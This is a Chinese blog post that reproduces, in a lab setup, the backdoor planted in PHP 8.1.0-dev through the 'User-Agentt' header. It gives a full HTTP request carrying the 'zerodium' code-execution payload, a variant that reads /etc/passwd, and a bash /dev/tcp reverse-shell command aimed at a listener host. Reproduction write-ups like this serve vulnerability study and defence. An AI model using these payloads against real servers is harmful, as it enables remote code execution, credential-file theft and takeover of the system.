joker0xxx3's Blog

现实告诉我：保持好奇心，享受孤独

PHP 8.1.0-dev User-Agentt 后门

发表于 2021-12-05 | 分类于漏洞复现 |

PHP 8.1.0-dev User-Agentt 后门

PHP 8.1.0-dev 版本于 2021 年 3 月 28 日被植入后门，但后门很快被发现并移除。当服务器上存在此后门时，攻击者可以通过发送User-Agentt标头来执行任意代码。

参考：

漏洞复现

环境启动后，服务运行于http://192.168.44.132:8080。

发送以下请求以执行代码var_dump(233*233);：

GET / HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
User-Agentt: zerodiumvar_dump(233*233);
Connection: close

将字段后面poc修改为zerodiumsystem("cat /etc/passwd");读取文件

修改payload执行反弹shell，并设置监听，将poc修改为以下反弹shell的poc

1	zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/192.168.44.1/4444 0>&1'");

本文作者： joker0xxx3
本文链接： http://joker-vip.github.io/2021/12/05/PHP%208.1.0-dev%20User-Agentt%20%E5%90%8E%E9%97%A8/
版权声明： 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 3.0 许可协议。转载请注明出处！

0%